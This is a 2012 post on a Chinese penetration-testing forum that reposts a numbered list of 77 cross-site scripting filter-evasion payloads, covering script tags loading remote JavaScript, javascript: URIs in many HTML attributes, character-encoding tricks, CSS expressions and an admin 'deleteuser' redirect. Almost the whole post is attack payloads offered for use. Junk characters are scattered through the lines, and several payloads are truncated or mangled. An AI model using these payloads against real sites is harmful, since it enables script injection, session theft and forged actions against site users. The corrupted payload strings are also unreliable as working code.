找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 xss跨站脚本攻击汇总
返回列表 发新帖
查看: 3997|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。! n" K' y% r0 W2 u# A/ _
6 \/ j6 O% G; W
(1)普通的XSS JavaScript注入# q4 B! V8 y- F* H2 K0 u- B( Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 [: y4 {* H/ Z( u9 }8 X6 t- c

$ \: x1 p& R1 j( g  X, [  h$ i" y. ~% u (2)IMG标签XSS使用JavaScript命令
4 ?+ a$ ]( n: V* b5 g2 y <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, }2 ?5 ~: K" ~$ N% D
# O4 f8 E1 D# }( v
(3)IMG标签无分号无引号
5 s, W- f. Z/ P6 ^! N <IMG SRC=javascript:alert(‘XSS’)>; z5 k% J: L# b0 D: U1 y, S( k
3 K1 \& c6 H9 q( H! O/ Y
(4)IMG标签大小写不敏感# I  U; ^% ?/ D" \
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  V4 e+ S! f3 f" C
4 o1 h* {6 R6 {2 O  B2 P (5)HTML编码(必须有分号)
+ u3 u  h) W/ B' W! y$ a+ c# J <IMG SRC=javascript:alert(“XSS”)>
1 {1 h0 ?+ I+ Q
7 ^- B; K7 q% V3 z# _' l% Y. J. k: V+ @ (6)修正缺陷IMG标签
! z8 f6 I& h; O0 S; s <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! U' \, v+ r) F/ {  ?

4 s' S1 |( B9 U  n' `# V8 ~ (7)formCharCode标签(计算器)
; \  n' z1 V( O7 u4 Y <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 g; Q+ m9 c4 f; D3 b9 W, Y0 ^

+ a7 }1 Y0 o; `7 v7 f) v( N (8)UTF-8的Unicode编码(计算器)
+ g7 f, K9 f8 T; N <IMG SRC=jav..省略..S')>% O! N: [. v% N  Y& ^

, D; o  b" x7 d: ]; J( b (9)7位的UTF-8的Unicode编码是没有分号的(计算器)* y  _5 {( d, K/ s, l
<IMG SRC=jav..省略..S')>1 E( I* g  a9 P( r% S& B: {

: Q0 e, q; ?  w7 V# B8 o (10)十六进制编码也是没有分号(计算器)& m* q2 S4 u  z! {
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
+ D3 }5 T( U( x( m# U* B+ s: |+ K5 D" V& F, Y* X9 I7 U
(11)嵌入式标签,将Javascript分开$ r! A4 b) Z6 |3 Q3 V% z9 a+ a
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 D% V9 g$ o& v+ H
) ]* v& [. m) n8 Q0 l. I (12)嵌入式编码标签,将Javascript分开6 b# c* g) [4 Q. w1 R
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 P7 v8 J" a2 m0 Y8 `$ W
/ S$ X4 N/ ^/ j5 q( B
(13)嵌入式换行符2 \+ j  {, ~9 ]/ H7 K
<IMG SRC=”jav ascript:alert(‘XSS’);”>
  @- H/ g. a7 V' M/ m& b7 D) S4 [6 p) ^: w: F! W- X: w0 w& r
(14)嵌入式回车
9 C. r2 y! ~  |! i( } <IMG SRC=”jav ascript:alert(‘XSS’);”>
& j+ y5 p* t9 {0 P
  a, P  B  Z6 N9 w7 E (15)嵌入式多行注入JavaScript,这是XSS极端的例子+ j, ]. p* F; I' @0 V. o. \% X
<IMG SRC=”javascript:alert(‘XSS‘)”>7 W6 c; k( J0 A5 f7 K

8 f. z' {: B# ^6 Y+ m8 o$ |  E (16)解决限制字符(要求同页面)& G! O9 `6 q& i
<script>z=’document.’</script>0 w% R) F5 C3 M, K4 b+ E
<script>z=z+’write(“‘</script>
! z# \' ~3 _- _7 S <script>z=z+’<script’</script>. y" G; Z, h3 D- |  x, o
<script>z=z+’ src=ht’</script>
0 K0 O% J3 c8 O/ p- I4 u+ M <script>z=z+’tp://ww’</script>- R; I; P: T; E% d& O( I, C
<script>z=z+’w.shell’</script>3 x+ h. _7 `  T+ r! _, l  }
<script>z=z+’.net/1.’</script>- J. E3 k; l$ X5 s! z5 P" x+ A) J
<script>z=z+’js></sc’</script>5 l" p2 k- R" j  J7 ], U! D
<script>z=z+’ript>”)’</script>. n1 `6 C8 H3 X, y8 k+ N* R" I
<script>eval_r(z)</script>
. |% t/ R1 b. o4 L+ p9 L2 Y$ ?. c7 q: ^" }+ r! |
(17)空字符$ \& {1 C1 _) D+ K3 u- l- j
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 k- z% T- o+ y( S% H) X4 G: z

% J# R$ b0 N- h9 l (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用- z% g1 K6 L5 E4 I7 s  m1 ^# ?
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
! C. \/ E& d. }/ C: t2 T0 E8 K. {4 E2 w8 W! W% u
(19)Spaces和meta前的IMG标签3 L8 |( K% \% @2 \5 q: H
<IMG SRC=”   javascript:alert(‘XSS’);”>5 I+ T1 m! I+ ~
6 a& N3 i4 Q" N' ]( `- `8 v/ S7 d, S
(20)Non-alpha-non-digit XSS
2 }/ Z0 d. I! {6 [3 V; s' w <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. M) M5 S6 Z/ S9 w# o' r

8 U9 i8 o( W) a" D8 i/ v' n (21)Non-alpha-non-digit XSS to 2
$ \% y; P/ o$ m1 N <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 M6 S9 b7 o0 Z
2 v. n6 l# p& R3 n (22)Non-alpha-non-digit XSS to 3
9 A' u* X) K' N- k <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 N: c# _% y5 Z9 F

/ Q0 T+ v- L5 _7 D  ] (23)双开括号& C% c' ?; H9 a  {) f$ N5 d
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
% d# |' U5 O8 ]  g, H6 l4 k) ?0 `) G
* H# |6 F* i( c# {" g4 U9 ^ (24)无结束脚本标记(仅火狐等浏览器)
! j( f% x* p' V2 j' z3 g <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% O" P' c4 a6 x* K* H
. S: X: ^0 [/ R: W* z" B/ D! M
(25)无结束脚本标记2
* X& A) D+ j1 N+ y <SCRIPT SRC=//3w.org/XSS/xss.js>9 I- B2 R- I6 m" Z, G
' A4 v4 d- S. e
(26)半开的HTML/JavaScript XSS
  A' l9 [5 Z. f; u <IMG SRC=”javascript:alert(‘XSS’)”
& }( ~/ V4 g; G6 [8 g; B
0 R$ f/ k( z- \4 k* G (27)双开角括号
8 z; k$ U! v. U+ t, ?9 x0 G/ h6 ] <iframe src=http://3w.org/XSS.html <' V1 [1 L% Q9 w

; h8 D& S# `; c$ H (28)无单引号 双引号 分号
* s9 a# |" P" s: J1 e <SCRIPT>a=/XSS/8 k+ R9 @/ V, ^: @2 L0 ?8 e- w+ z) A
alert(a.source)</SCRIPT>" [7 i4 }! [* E

; z1 |' a, P7 g) b5 r: G5 R5 c( F (29)换码过滤的JavaScript# w5 e/ t, f, N- B7 D, v
\”;alert(‘XSS’);//
. V, N5 u: ]) q7 O5 f+ `" r: O; L6 L3 y
# d4 v* r6 e9 c (30)结束Title标签
0 G$ @% H' T# V  E8 h" m+ r </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% f- X9 M% h; h% _) L( J' O" o0 V+ `& ^% a5 B' c3 N
(31)Input Image! ^' @! m* ^/ u3 ~1 }& _8 y
<INPUT SRC=”javascript:alert(‘XSS’);”>
7 i: i* I( ?( |
7 f% x- ^% m8 k (32)BODY Image0 g: i) B( ^; b  q  D
<BODY BACKGROUND=”javascript:alert(‘XSS’)”># y6 E# f9 v: s: P  k' u" s

0 X7 h; ?! ?5 K6 ? (33)BODY标签
% l! q; Q! m! c <BODY(‘XSS’)>
" Y9 u9 l) h4 S" d7 K
3 ]& n2 n4 z) W2 R3 l( v (34)IMG Dynsrc
/ T8 b7 B3 z' S5 X <IMG DYNSRC=”javascript:alert(‘XSS’)”>7 o3 Z6 ~4 a" k( u, M9 h+ b$ Q/ R* v9 X: l

3 A# y% a, S; N, D6 ?  o4 N* G (35)IMG Lowsrc$ G0 m/ o2 d% t5 R/ D; d
<IMG LOWSRC=”javascript:alert(‘XSS’)”>8 V0 F( V5 w3 q0 @' O
( t7 [3 V) ?$ _  R# }8 m" b
(36)BGSOUND
1 B* M; [) U3 k% s- | <BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ d# N- q; j' E) D
  d) A7 m/ V( \ (37)STYLE sheet# v5 N$ \. d' Y: Y3 d& c; L
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 S! _0 g$ n* i$ E6 w9 ^3 I9 ^4 Q
# o/ x" O, p+ z2 [
(38)远程样式表
: r" ?8 E: x* t <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! I+ U. }1 W; {) ]( l% l

2 H* O9 t- g3 c" D+ i (39)List-style-image(列表式)
5 u0 |3 ~0 }- h; D% W1 D5 P4 H <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 r3 _3 Q0 l, L9 U$ ?. g# e& n
7 C1 t3 r! A3 J; ~2 r
(40)IMG VBscript
$ |3 g, y( k7 ]5 u; S8 Z <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ A- ~7 T- E* o" m7 E: ]: J
/ h8 D" K% L; W( C: a, {% C (41)META链接url2 A+ I( w) D9 n; R
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>  o- G: L7 {+ Q! k9 k( z" I
+ E) s) p- \2 b' p# Y; Y
(42)Iframe
3 f+ d0 t7 C3 m <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: F, R% N3 C' _; E- m- w" ?1 g2 V% E7 c+ f6 D0 P1 ^
(43)Frame4 ?7 o3 t* }) b  q
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>! |5 e5 U1 M' w$ h- s

1 h/ u" S, I. P+ J" a% { (44)Table6 D+ V: [" {: E0 P
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, x% P* U) f0 Y; r. f* _

$ O: g' ~3 [4 ^' ^  d (45)TD) L- ~5 c" L( g& S8 g3 O6 j! w# q, O
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ B; V$ R1 i3 Z% }
; {; O( {) L( z% b: d7 ]; L
(46)DIV background-image
9 b, U) k4 x6 R$ C' g0 W. j7 J, [ <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 q: H0 w0 ^: S1 n- f% k" K
0 Q- M7 B; h; ~( x6 M" w
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
( ~2 V9 K! J& x) i/ i$ O <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& ]" h; Q( x2 Y+ s
9 |( Q  f. f! d. G: g# p) C
(48)DIV expression
. t3 c" b( B8 Q3 @% t# Z& u$ D <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
7 u0 j% J$ c) m8 H  o) D
& v* E6 Q8 g. r, f (49)STYLE属性分拆表达
8 K7 s# A3 y+ }# W1 G  b- W <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ [' p* X4 E+ I5 x* l; {. q+ ?, M9 |$ ], B. o
(50)匿名STYLE(组成:开角号和一个字母开头)% G  s& u) ?3 H( c, C. l1 P, w4 l2 [
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”># }3 X' i2 G# F9 K8 F( i& w
' Y7 p( }1 o1 y% E( Z0 }
(51)STYLE background-image
+ U+ L- u7 v% L( x6 ~+ a <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 D$ X/ O4 T: K8 b0 d& S
6 q5 c4 j0 D8 i
(52)IMG STYLE方式
+ @0 E1 T" f6 W6 h% D exppression(alert(“XSS”))’>
1 Q. F# ?! b$ c+ L- x
" ]' }: `# f6 Z- @* A9 ^' e5 o0 _ (53)STYLE background' d: _7 x# K3 b' q/ }* r
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 @. J: u" R  z) b3 j0 U. U: e, t1 Q% c. U3 j5 e
(54)BASE) c7 _# ^$ O8 P- O9 i' R! c
<BASE HREF=”javascript:alert(‘XSS’);//”>
  q+ Q' b  y0 e' b% P0 o7 I) S. P' f2 r5 {3 V( w- n
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& ?% Y9 j+ M7 {
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>0 r( O- t% h; b+ q4 Z; K" ]% m, o; ?
0 \0 |5 J+ E2 n. Q* ~2 [
(56)在flash中使用ActionScrpt可以混进你XSS的代码2 v4 P5 b: ~- ^
a=”get”;# ~+ F, s% ^3 m) W, Z
b=”URL(\”";
5 R) Y. N* u6 Q0 A$ i' |' V c=”javascript:”;1 V" i# K* v/ \8 i& j1 L
d=”alert(‘XSS’);\”)”;
1 D% T7 K1 v4 w+ s eval_r(a+b+c+d);# ]3 v0 M- S. U8 {. ^" \: D
) K7 x- t* y0 J2 Q& V8 ]! M6 I
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 U' e3 i7 [& x: [* x, ~ <HTML xmlns:xss>/ c. I3 x6 O8 B' L0 D2 j+ @" |1 ~
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>& O% g* ^9 e/ Z( y& i- Y
<xss:xss>XSS</xss:xss>8 a( i* G  d2 k" O( P
</HTML>  ?0 }3 F5 u) c8 O7 o
& z6 k- }, s0 w, w& K. k
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
7 j* I0 f) E! m" N" e) p <SCRIPT SRC=””></SCRIPT>" W* _5 k- s4 q8 K

" C& s3 Y* d- b6 F, z0 E (59)IMG嵌入式命令,可执行任意命令+ y" a8 f, {' n6 }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>7 n9 v! G# T# K. z

0 W# O( D" l; J3 f! x3 G( X- W (60)IMG嵌入式命令(a.jpg在同服务器)
' Q( E5 h* T1 c5 ` Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( ]2 w, j- s9 ?! S+ v3 X, F
- a9 n) p1 z( w (61)绕符号过滤9 i0 _; b! Z6 T* `! l& l4 g9 N( c) W4 \
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 |7 L9 j" V- s! ^

) d7 y8 m6 `6 b) [ (62)' t+ I- w$ {: Y  P
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>% m4 Q. D8 U: h/ r2 f) y

; }* ^* `* f( C. S0 ~% @+ T; r# ?( a7 ~ (63)+ g1 p. D  b) W* S0 f9 [" B' x) e
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 _/ i3 b$ Q9 W! q* p0 ?2 z/ d+ L- o! m
(64)
4 N! k5 i2 w# ]7 t# y <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
, L1 c  A2 L  D+ o5 ?
0 T( C" L2 s5 |& b7 Z; f (65)
, A9 }  r: y7 v <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
- w8 R1 d" }: [; i  x
; V  _5 W, p- ~  V) ]5 p8 ~ (66); w9 y; V$ b$ X7 R3 B: z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
, k  h8 ?0 r  h, \! e; b) H
6 P5 }) Z; @) z5 m0 s% I (67)& _  x/ r5 D2 W$ d, a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>' V+ a/ v  \/ r1 v

' H6 n, F: j4 q (68)URL绕行8 m# q6 |0 H& |) Q- Q7 b8 M
<A HREF=”http://127.0.0.1/”>XSS</A>. F: N0 V7 z- ?# u# Q) G

4 f* w, S  w0 \9 Q  l; s (69)URL编码
$ _# N4 J# S  A5 i- A, s4 b/ N <A HREF=”http://3w.org”>XSS</A>. y0 c, j0 l9 @# _
& @: K" E' L1 x7 n( u1 R, a
(70)IP十进制
1 D, G: K5 H8 r8 @+ q. |9 Q <A HREF=”http://3232235521″>XSS</A>
7 W1 p* @( b! a! h. e
; V) N+ E3 V- y& A( P (71)IP十六进制
& h" c6 ]0 c, Q, j& h+ o <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>" h/ Z) a% _' @$ H' ]7 n

0 S2 i5 U) ~6 y7 B (72)IP八进制3 H! {! p3 ~9 V0 s+ f
<A HREF=”http://0300.0250.0000.0001″>XSS</A>6 g2 }2 O  c5 U
% N8 C* j4 X* ^4 k; M
(73)混合编码: j9 f' m. ~* ?' `# C( X
<A HREF=”h+ \/ X& q+ z1 B2 a7 U
tt p://6 6.000146.0×7.147/”">XSS</A>9 z$ E' y/ v* N

" k6 k/ N8 ^; A0 d  { (74)节省[http:]
! ?3 s9 f9 a# G <A HREF=”//www.google.com/”>XSS</A>- T+ f/ F6 E* w2 Z* G7 n7 k
* }7 P2 S4 x; }# h; g5 J. j! x) w$ L0 b
(75)节省[www]
! w$ M: X# O+ B, q+ ^0 V <A HREF=”http://google.com/”>XSS</A>
6 I3 U; _. K. E( j- T
: c. g4 Y) t& o9 {6 { (76)绝对点绝对DNS
8 f+ O2 H2 K' D: @+ ]" L! h8 r <A HREF=”http://www.google.com./”>XSS</A>1 `2 F* Y+ T0 f9 b% C/ I) Z, ~+ A
' g4 b: n! q" F" f/ P0 {
(77)javascript链接
3 g: N/ C3 |  `2 g# p6 j <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表